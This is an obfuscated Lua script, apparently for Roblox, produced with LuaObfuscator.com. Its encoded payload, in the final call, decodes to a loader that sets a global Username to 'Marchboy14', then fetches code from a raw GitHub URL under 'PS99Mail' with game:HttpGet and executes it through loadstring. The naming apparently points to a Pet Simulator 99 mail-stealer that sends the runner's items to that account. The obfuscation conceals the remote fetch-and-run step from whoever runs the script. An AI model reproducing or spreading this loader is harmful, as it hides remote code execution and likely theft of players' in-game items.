--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v84,v19);v19=nil;v102=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((879 -(277 + 5 + 595))^(v32-(1 -0))))%((4 -2)^(((v33-(1 + 0)) -(v32-1)) + (1 -0))) ;return v86-(v86%(620 -(555 + 64))) ;end end else local v87=((1890 -(892 + 65)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v87 + v87))>=v87) and ((2213 -1285) -((395 -181) + 713))) or (0 + 0) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (351 -(87 + 263)) ;v34=(444 -263) -(67 + 113) ;end if (v34==(1 + 0)) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v37 * (1017 -761)) + v36 ;end local function v23()local v38=952 -(802 + 150) ;local v39;local v40;local v41;local v42;while true do if ((2 -1)==v38) then return (v42 * (30433252 -13656036)) + (v41 * (47703 + 17833)) + (v40 * (1253 -(915 + 82))) + v39 ;end if (v38==((0 -0) -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (1190 -(1069 + 118)) );v18=v18 + 4 ;v38=(2 -1) + 0 ;end end end local function v24()local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + 0)) then v46=(1 + 0) -0 ;v47=(v20(v45,(886 -(261 + 624)) + 0 ,811 -(368 + (751 -328)) ) * ((6 -4)^32)) + v44 ;v43=20 -(10 + (1088 -(1020 + 60))) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1;end if (v43==(445 -(416 + 26))) then if (v48==0) then if (v47==(0 -0)) then return v49 * (0 + (1423 -(630 + 793))) ;else v48=3 -2 ;v46=0 -0 ;end elseif (v48==(2485 -((686 -541) + 293))) then return ((v47==(430 -(44 + 386))) and (v49 * (1/(1486 -(998 + 488))))) or (v49 * NaN) ;end return v8(v49,v48-(325 + 698) ) * (v46 + (v47/((2 + 0)^(824 -(201 + 571))))) ;end if (v43==(1140 -(116 + 1022))) then v48=v20(v45,87 -66 ,19 + 12 );v49=((v20(v45,116 -84 )==(3 -2)) and  -(860 -(814 + 45))) or (2 -1) ;v43=1 + 2 ;end end end local function v25(v50)local v51=0 + 0 + 0 ;local v52;local v53;while true do if (v51==((1061 -(87 + 968)) -4)) then v53={};for v93=1748 -(760 + 987) , #v52 do v53[v93]=v2(v1(v3(v52,v93,v93)));end v51=1916 -(1789 + 124) ;end if (v51==3) then return v6(v53);end if (v51==(766 -(745 + 21))) then v52=nil;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=2 -1 ;end if (v51==1) then v52=v3(v16,v18,(v18 + v50) -(3 -2) );v18=v18 + v50 ;v51=1 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=290 -(60 + 230) ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54~=2) then else local v90=0;while true do if (v90~=1) then else v54=1332 -(797 + 532) ;break;end if (v90==(572 -(426 + 146))) then v59=nil;v60=nil;v90=1 + 0 ;end end end if (v54~=(1459 -(282 + 1174))) then else v61=nil;while true do local v95=811 -(569 + 242) ;while true do if (1==v95) then if ((0 -0)==v55) then v56={};v57={};v58={};v59={v56,v57,nil,v58};v55=1272 -(945 + 326) ;end break;end if (v95==(0 -0)) then if (v55==1) then v60=v23();v61={};for v106=1 -0 ,v60 do local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==(0 + 0)) then v108=700 -(271 + 429) ;v109=nil;v107=1 + 0 ;end if (v107==(1501 -(1408 + 92))) then v110=nil;v111=nil;v107=240 -(64 + 174) ;end if (v107~=2) then else while true do if (v108==(0 + 0)) then local v158=0 -0 ;while true do if (v158~=(337 -(144 + 192))) then else v108=1087 -(461 + 625) ;break;end if (v158==(1288 -(993 + 295))) then v109=0 + 0 ;v110=nil;v158=1;end end end if (v108~=(1172 -(418 + 753))) then else v111=nil;while true do if (v109~=(0 + 0)) then else local v178=0;while true do if (0==v178) then v110=v21();v111=nil;v178=1 + 0 ;end if (1==v178) then v109=1;break;end end end if (v109~=(1581 -(1183 + 397))) then else if (v110==(2 -1)) then v111=v21()~=(0 + 0) ;elseif (v110==(1 + 1)) then v111=v24();elseif (v110~=3) then else v111=v25();end v61[v106]=v111;break;end end break;end end break;end end end v59[3]=v21();v55=1 + 1 ;end if (v55~=2) then else local v105=0 + 0 ;while true do if (v105==(529 -(406 + 123))) then for v112=1934 -(565 + 1368) ,v23() do local v113=1769 -(1749 + 20) ;local v114;local v115;local v116;local v117;while true do if (v113~=(0 + 0)) then else v114=0 -0 ;v115=nil;v113=1;end if (v113==1) then v116=nil;v117=nil;v113=1324 -(1249 + 73) ;end if (2~=v113) then else while true do if (v114==(1 + 0)) then v117=nil;while true do if (v115==0) then local v180=0;while true do if (v180==(1 + 0)) then v115=857 -(564 + 292) ;break;end if (v180~=(0 -0)) then else v116=0;v117=nil;v180=1;end end end if (v115==(2 -1)) then while true do if (v116==0) then v117=v21();if (v20(v117,305 -(244 + 60) ,1 + 0 )==0) then local v181=0;local v182;local v183;local v184;local v185;local v186;while true do if (v181==(478 -(41 + 435))) then v186=nil;while true do if (v182~=1) then else local v187=1145 -(466 + 679) ;local v188;while true do if (v187~=(0 -0)) then else v188=0 -0 ;while true do if (v188==(1900 -(106 + 1794))) then local v199=1125 -(936 + 189) ;while true do if (v199==(1 + 0)) then v188=1 + 0 ;break;end if (0==v199) then v185=nil;v186=nil;v199=1 + 0 ;end end end if (v188~=(1 + 0)) then else v182=5 -3 ;break;end end break;end end end if (v182==(267 -(176 + 91))) then v183=0 -0 ;v184=nil;v182=1 -0 ;end if (v182==(5 -3)) then while true do if (2~=v183) then else local v189=1092 -(975 + 117) ;while true do if (v189==(115 -(4 + 110))) then v183=3;break;end if (v189==(0 + 0)) then local v200=0;local v201;while true do if (v200==(0 -0)) then v201=0 -0 ;while true do if (v201==(584 -(57 + 527))) then if (v20(v185,1428 -(41 + 1386) ,104 -(17 + 86) )~=1) then else v186[3 -1 ]=v61[v186[2]];end if (v20(v185,2 + 0 ,4 -2 )==(1 -0)) then v186[8 -5 ]=v61[v186[3]];end v201=1 -0 ;end if (v201==(167 -(122 + 44))) then v189=1 -0 ;break;end end break;end end end end end if (v183==3) then if (v20(v185,1230 -(322 + 905) ,3)~=1) then else v186[615 -(602 + 9) ]=v61[v186[12 -8 ]];end v56[v112]=v186;break;end if (v183==(872 -(826 + 46))) then local v191=0 + 0 ;local v192;local v193;while true do if (v191==(1 + 0)) then while true do if (v192==(0 -0)) then v193=0;while true do if (v193==0) then local v202=0 + 0 ;while true do if (v202~=(1898 -(260 + 1638))) then else local v210=0;while true do if (v210==(440 -(382 + 58))) then v184=v20(v117,67 -(30 + 35) ,3);v185=v20(v117,3 + 1 ,6);v210=1 -0 ;end if (v210~=1) then else v202=1258 -(1043 + 214) ;break;end end end if (1==v202) then v193=2 -1 ;break;end end end if (v193==(3 -2)) then v183=1206 -(902 + 303) ;break;end end break;end end break;end if (v191~=0) then else v192=0;v193=nil;v191=1213 -(323 + 889) ;end end end if (v183==(1 -0)) then local v194=0 -0 ;local v195;local v196;while true do if (v194==(580 -(361 + 219))) then v195=1690 -(1121 + 569) ;v196=nil;v194=321 -(53 + 267) ;end if (v194~=(1 + 0)) then else while true do if (v195==(413 -(15 + 398))) then v196=982 -(18 + 964) ;while true do if (v196==(3 -2)) then v183=2 -0 ;break;end if (v196~=(0 + 0)) then else v186={v22(),v22(),nil,nil};if (v184==(0 -0)) then local v207=0 + 0 ;local v208;local v209;while true do if (v207~=(126 -(116 + 10))) then else v208=0;v209=nil;v207=1 + 0 ;end if (v207==(237 -(141 + 95))) then while true do if (v208==(738 -(542 + 196))) then v209=0;while true do if (v209==0) then v186[6 -3 ]=v22();v186[9 -5 ]=v22();break;end end break;end end break;end end elseif (v184==(1 + 0)) then v186[1 + 2 ]=v23();elseif (v184==2) then v186[2 + 1 ]=v23() -((1 + 1)^(43 -27)) ;elseif (v184==(7 -4)) then local v213=0;local v214;local v215;local v216;while true do if (v213==(0 -0)) then v214=0 -0 ;v215=nil;v213=1552 -(1126 + 425) ;end if (v213==1) then v216=nil;while true do if ((405 -(118 + 287))~=v214) then else v215=0 -0 ;v216=nil;v214=1122 -(118 + 1003) ;end if (v214~=(2 -1)) then else while true do if (v215~=(0 -0)) then else v216=377 -(142 + 235) ;while true do if (v216==(0 + 0)) then v186[13 -10 ]=v23() -((4 -2)^(4 + 12)) ;v186[4]=v22();break;end end break;end end break;end end break;end end end v196=1;end end break;end end break;end end end end break;end end break;end if ((849 -(254 + 595))~=v181) then else v182=126 -(55 + 71) ;v183=nil;v181=978 -(553 + 424) ;end if (v181==(1791 -(573 + 1217))) then v184=nil;v185=nil;v181=3 -1 ;end end end break;end end break;end end break;end if (v114~=(0 + 0)) then else v115=0 + 0 ;v116=nil;v114=1;end end break;end end end for v118=1 + 0 ,v23() do v57[v118-1 ]=v28();end v105=1 + 0 ;end if (v105==(1 + 0)) then return v59;end end end v95=2 -1 ;end end end break;end if (v54==(2 -1)) then local v91=0;while true do if (0==v91) then v57=nil;v58=nil;v91=2 -1 ;end if (v91==(1 + 0)) then v54=2 -0 ;break;end end end if (v54~=(0 + 0)) then else local v92=0 -0 ;while true do if (v92==(49 -(25 + 23))) then v54=1;break;end if (v92~=(753 -(239 + 514))) then else v55=0;v56=nil;v92=1 + 0 ;end end end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v89=0;while true do if (v89==0) then v80=v68[v72];v81=v80[1];v89=1;end if (v89==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then local v120=v80[2];local v121=v78[v80[3]];v78[v120 + 1 ]=v121;v78[v120]=v121[v80[4]];else local v125=0;local v126;while true do if (0==v125) then v126=v80[2];v78[v126]=v78[v126](v13(v78,v126 + 1 ,v73));break;end end end elseif (v81<=2) then v64[v80[3]]=v78[v80[2]];elseif (v81==3) then local v146=0;local v147;while true do if (v146==0) then v147=v80[2];v78[v147]=v78[v147](v13(v78,v147 + 1 ,v73));break;end end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=7) then if (v81<=5) then v78[v80[2]]();elseif (v81==6) then v78[v80[2]]=v80[3];else for v161=v80[2],v80[3] do v78[v161]=nil;end end elseif (v81<=8) then v72=v80[3];elseif (v81==9) then do return;end else v72=v80[3];end elseif (v81<=15) then if (v81<=12) then if (v81>11) then local v130=v80[2];local v131,v132=v71(v78[v130](v13(v78,v130 + 1 ,v80[3])));v73=(v132 + v130) -1 ;local v133=0;for v138=v130,v73 do v133=v133 + 1 ;v78[v138]=v131[v133];end else v78[v80[2]]();end elseif (v81<=13) then for v141=v80[2],v80[3] do v78[v141]=nil;end elseif (v81==14) then local v151=0;local v152;local v153;while true do if (0==v151) then v152=v80[2];v153=v78[v80[3]];v151=1;end if (1==v151) then v78[v152 + 1 ]=v153;v78[v152]=v153[v80[4]];break;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=18) then if (v81<=16) then do return;end elseif (v81>17) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v64[v80[3]]=v78[v80[2]];end elseif (v81<=19) then local v134=v80[2];local v135,v136=v71(v78[v134](v13(v78,v134 + 1 ,v80[3])));v73=(v136 + v134) -1 ;local v137=0;for v143=v134,v73 do v137=v137 + 1 ;v78[v143]=v135[v137];end elseif (v81>20) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else v78[v80[2]]=v80[3];end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030A3O004D61726368626F793134030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012143O00014O000D000100013O0026043O00020001000100040A3O00020001001214000100013O002604000100050001000100040A3O00050001001214000200033O001202000200023O001215000200043O001215000300053O002001000300030006001214000500074O0013000300054O000300023O00022O000B00020001000100040A3O0014000100040A3O0005000100040A3O0014000100040A3O000200012O00103O00017O00",v9(),...);
